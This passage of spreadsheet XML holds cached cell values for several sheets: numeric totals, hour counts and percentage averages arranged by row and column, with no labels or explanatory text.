        <row r="71">
          <cell r="Q71" t="str">
            <v>9.50</v>
          </cell>
          <cell r="R71" t="str">
            <v>158.75</v>
          </cell>
          <cell r="S71" t="str">
            <v>4185.25</v>
          </cell>
          <cell r="T71">
            <v>39.5833333333333</v>
          </cell>
          <cell r="U71">
            <v>55.1215277777778</v>
          </cell>
          <cell r="V71">
            <v>50.4004094412331</v>
          </cell>
          <cell r="W71">
            <v>208.526315789474</v>
          </cell>
          <cell r="X71">
            <v>218.979527559055</v>
          </cell>
          <cell r="Y71">
            <v>213.708320888836</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>178.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4247.17</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>62.0381944444444</v>
          </cell>
          <cell r="V72">
            <v>51.1460741811175</v>
          </cell>
          <cell r="W72">
            <v>58.4583333333333</v>
          </cell>
          <cell r="X72">
            <v>64.7674483685006</v>
          </cell>
          <cell r="Y72">
            <v>61.430788030618</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>178.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4374.88</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>62.0381944444444</v>
          </cell>
          <cell r="V73">
            <v>52.6840077071291</v>
          </cell>
          <cell r="W73">
            <v>55.9583333333333</v>
          </cell>
          <cell r="X73">
            <v>62.3495830301674</v>
          </cell>
          <cell r="Y73">
            <v>62.8936679406064</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="12">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>731.78</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>791</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>7930.196</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6023</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>4278</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>70335.876</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>5702</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5008.93</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>65770.74</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>2245</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>350.32</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>9056.26</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>377.32</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18326.88</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3457</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3666.79</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>18784.37</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>614.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>19603.23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824.32</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>261</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4383.437</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>869.14</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>226.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5961.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>72.4358974358974</v>
          </cell>
          <cell r="V68">
            <v>71.5841738712776</v>
          </cell>
          <cell r="W68">
            <v>250.958333333333</v>
          </cell>
          <cell r="X68">
            <v>263.619469026549</v>
          </cell>
          <cell r="Y68">
            <v>266.277448909928</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>216.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5697.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>69.3333333333333</v>
          </cell>
          <cell r="V69">
            <v>68.4101825168108</v>
          </cell>
          <cell r="W69">
            <v>21.9377386684377</v>
          </cell>
          <cell r="X69">
            <v>22.6074844509486</v>
          </cell>
          <cell r="Y69">
            <v>25.271376758766</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>16.92</v>
          </cell>
          <cell r="R71" t="str">
            <v>175.67</v>
          </cell>
          <cell r="S71" t="str">
            <v>4202.17</v>
          </cell>
          <cell r="T71">
            <v>70.5</v>
          </cell>
          <cell r="U71">
            <v>56.3044871794872</v>
          </cell>
          <cell r="V71">
            <v>50.4583333333333</v>
          </cell>
          <cell r="W71">
            <v>204.314420803782</v>
          </cell>
          <cell r="X71">
            <v>217.567029088632</v>
          </cell>
          <cell r="Y71">
            <v>213.670496433985</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>202.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4271.17</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>64.9583333333333</v>
          </cell>
          <cell r="V72">
            <v>51.2868635926993</v>
          </cell>
          <cell r="W72">
            <v>46.25</v>
          </cell>
          <cell r="X72">
            <v>62.5746287067647</v>
          </cell>
          <cell r="Y72">
            <v>61.3454861314347</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>202.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4398.88</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>64.9583333333333</v>
          </cell>
          <cell r="V73">
            <v>52.8203650336215</v>
          </cell>
          <cell r="W73">
            <v>47.2916666666667</v>
          </cell>
          <cell r="X73">
            <v>60.5664380520057</v>
          </cell>
          <cell r="Y73">
            <v>62.8085444476776</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="13">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>1460.86</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>843</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>8548.056</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6013</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>3451</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>70502.466</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>4795</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>3712.38</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>66853.36</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>51.48</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>9004.78</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>181.52</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18145.36</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>4795</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3072.38</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>20506.99</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>407</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>19196.23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163</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4220.437</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>2395.41</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>250.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5985.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>74.4047619047619</v>
          </cell>
          <cell r="V68">
            <v>71.6658285440613</v>
          </cell>
          <cell r="W68">
            <v>250.541666666667</v>
          </cell>
          <cell r="X68">
            <v>262.364</v>
          </cell>
          <cell r="Y68">
            <v>266.214353616138</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>240.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5721.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>71.5238095238095</v>
          </cell>
          <cell r="V69">
            <v>68.5009578544061</v>
          </cell>
          <cell r="W69">
            <v>23.8834192582737</v>
          </cell>
          <cell r="X69">
            <v>22.7284741058475</v>
          </cell>
          <cell r="Y69">
            <v>25.2659337183252</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>9.25</v>
          </cell>
          <cell r="R71" t="str">
            <v>184.92</v>
          </cell>
          <cell r="S71" t="str">
            <v>4211.42</v>
          </cell>
          <cell r="T71">
            <v>38.5416666666667</v>
          </cell>
          <cell r="U71">
            <v>55.0357142857143</v>
          </cell>
          <cell r="V71">
            <v>50.4240900383142</v>
          </cell>
          <cell r="W71">
            <v>211.891891891892</v>
          </cell>
          <cell r="X71">
            <v>217.283149470041</v>
          </cell>
          <cell r="Y71">
            <v>213.666589891296</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>226.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4295.17</v>
          </cell>
          <cell r="T72">
            <v>100</v>
          </cell>
          <cell r="U72">
            <v>67.4613095238095</v>
          </cell>
          <cell r="V72">
            <v>51.4268438697318</v>
          </cell>
          <cell r="W72">
            <v>63.2083333333333</v>
          </cell>
          <cell r="X72">
            <v>62.6417258569727</v>
          </cell>
          <cell r="Y72">
            <v>61.3558951100888</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>226.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4422.88</v>
          </cell>
          <cell r="T73">
            <v>100</v>
          </cell>
          <cell r="U73">
            <v>67.4613095238095</v>
          </cell>
          <cell r="V73">
            <v>52.955938697318</v>
          </cell>
          <cell r="W73">
            <v>54.9166666666667</v>
          </cell>
          <cell r="X73">
            <v>59.9682357612388</v>
          </cell>
          <cell r="Y73">
            <v>62.7657205259921</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="14">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>912.460000000001</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>850</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>8610.516</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6216</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>2967</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>71632.136</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3898</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4149.2</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>66602.16</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>226.14</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8778.64</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>604.1</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17541.26</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3898</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>2790.46</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>21614.53</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>528.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>18667.73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697.02</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>131</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4786.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>2119.33</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>274.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>6009.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>76.1111111111111</v>
          </cell>
          <cell r="V68">
            <v>71.7470152817574</v>
          </cell>
          <cell r="W68">
            <v>259</v>
          </cell>
          <cell r="X68">
            <v>262.069343065693</v>
          </cell>
          <cell r="Y68">
            <v>266.18554196418</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>264.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5745.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>73.4222222222222</v>
          </cell>
          <cell r="V69">
            <v>68.5912129894938</v>
          </cell>
          <cell r="W69">
            <v>23.3537644787645</v>
          </cell>
          <cell r="X69">
            <v>22.784296547366</v>
          </cell>
          <cell r="Y69">
            <v>25.2582130579988</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.67</v>
          </cell>
          <cell r="R71" t="str">
            <v>193.58</v>
          </cell>
          <cell r="S71" t="str">
            <v>4220.08</v>
          </cell>
          <cell r="T71">
            <v>36.125</v>
          </cell>
          <cell r="U71">
            <v>53.7722222222222</v>
          </cell>
          <cell r="V71">
            <v>50.3829990448902</v>
          </cell>
          <cell r="W71">
            <v>227.797001153403</v>
          </cell>
          <cell r="X71">
            <v>217.765265006716</v>
          </cell>
          <cell r="Y71">
            <v>213.696126613714</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>15.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>241.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4310.17</v>
          </cell>
          <cell r="T72">
            <v>62.5</v>
          </cell>
          <cell r="U72">
            <v>67.1305555555555</v>
          </cell>
          <cell r="V72">
            <v>51.4585721107927</v>
          </cell>
          <cell r="W72">
            <v>65.2666666666667</v>
          </cell>
          <cell r="X72">
            <v>62.8046509703314</v>
          </cell>
          <cell r="Y72">
            <v>61.3695051471288</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>15.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>241.67</v>
          </cell>
          <cell r="S73" t="str">
            <v>4437.88</v>
          </cell>
          <cell r="T73">
            <v>62.5</v>
          </cell>
          <cell r="U73">
            <v>67.1305555555555</v>
          </cell>
          <cell r="V73">
            <v>52.9832855778415</v>
          </cell>
          <cell r="W73">
            <v>62.9333333333333</v>
          </cell>
          <cell r="X73">
            <v>60.1522737617412</v>
          </cell>
          <cell r="Y73">
            <v>62.7662870559817</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="15">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>787</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>7823.516</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6259</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>2772</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>73214.876</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3613</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5169.9</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>65045.26</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>186.46</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8592.18</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>1662</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>361.46</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18841.8</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>1951</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4098.98</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>19466.55</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>523</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>18144.73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126</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4660.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>1904.26</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>298.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>6033.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>77.6041666666667</v>
          </cell>
          <cell r="V68">
            <v>71.8277380952381</v>
          </cell>
          <cell r="W68">
            <v>260.791666666667</v>
          </cell>
          <cell r="X68">
            <v>261.96644295302</v>
          </cell>
          <cell r="Y68">
            <v>266.164086364036</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>288.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5769.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>75.0833333333333</v>
          </cell>
          <cell r="V69">
            <v>68.6809523809524</v>
          </cell>
          <cell r="W69">
            <v>21.9800287585876</v>
          </cell>
          <cell r="X69">
            <v>22.7179622333206</v>
          </cell>
          <cell r="Y69">
            <v>25.2449393165991</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.92</v>
          </cell>
          <cell r="R71" t="str">
            <v>202.50</v>
          </cell>
          <cell r="S71" t="str">
            <v>4229.00</v>
          </cell>
          <cell r="T71">
            <v>37.1666666666667</v>
          </cell>
          <cell r="U71">
            <v>52.734375</v>
          </cell>
          <cell r="V71">
            <v>50.3452380952381</v>
          </cell>
          <cell r="W71">
            <v>218.72197309417</v>
          </cell>
          <cell r="X71">
            <v>217.807407407407</v>
          </cell>
          <cell r="Y71">
            <v>213.706727358714</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>12.42</v>
          </cell>
          <cell r="R72" t="str">
            <v>254.08</v>
          </cell>
          <cell r="S72" t="str">
            <v>4322.58</v>
          </cell>
          <cell r="T72">
            <v>51.75</v>
          </cell>
          <cell r="U72">
            <v>66.1666666666667</v>
          </cell>
          <cell r="V72">
            <v>51.4592857142857</v>
          </cell>
          <cell r="W72">
            <v>69.4847020933977</v>
          </cell>
          <cell r="X72">
            <v>63.1336586901763</v>
          </cell>
          <cell r="Y72">
            <v>61.3929643870096</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>12.42</v>
          </cell>
          <cell r="R73" t="str">
            <v>254.08</v>
          </cell>
          <cell r="S73" t="str">
            <v>4450.30</v>
          </cell>
          <cell r="T73">
            <v>51.75</v>
          </cell>
          <cell r="U73">
            <v>66.1666666666667</v>
          </cell>
          <cell r="V73">
            <v>52.9797619047619</v>
          </cell>
          <cell r="W73">
            <v>64.3317230273752</v>
          </cell>
          <cell r="X73">
            <v>60.3589420654912</v>
          </cell>
          <cell r="Y73">
            <v>62.7706559108375</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="16">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>808</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>7015.516</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6505</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>2920</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>74102.316</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3964</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5309.31</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>63699.95</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>227.8</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8364.38</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>336.54</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18505.26</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3964</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4171.47</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>19259.08</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>573.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>17571.23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151</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4509.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>2697.56</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>322.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>6057.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>78.921568627451</v>
          </cell>
          <cell r="V68">
            <v>71.9080009496676</v>
          </cell>
          <cell r="W68">
            <v>271.041666666667</v>
          </cell>
          <cell r="X68">
            <v>262.642857142857</v>
          </cell>
          <cell r="Y68">
            <v>266.183411390451</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>312.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5793.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>76.5490196078431</v>
          </cell>
          <cell r="V69">
            <v>68.7701804368471</v>
          </cell>
          <cell r="W69">
            <v>22.2459646425826</v>
          </cell>
          <cell r="X69">
            <v>22.6806971550636</v>
          </cell>
          <cell r="Y69">
            <v>25.2323717456494</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>12.92</v>
          </cell>
          <cell r="R71" t="str">
            <v>215.42</v>
          </cell>
          <cell r="S71" t="str">
            <v>4241.92</v>
          </cell>
          <cell r="T71">
            <v>53.8333333333333</v>
          </cell>
          <cell r="U71">
            <v>52.7990196078431</v>
          </cell>
          <cell r="V71">
            <v>50.355175688509</v>
          </cell>
          <cell r="W71">
            <v>227.012383900929</v>
          </cell>
          <cell r="X71">
            <v>218.35948379909</v>
          </cell>
          <cell r="Y71">
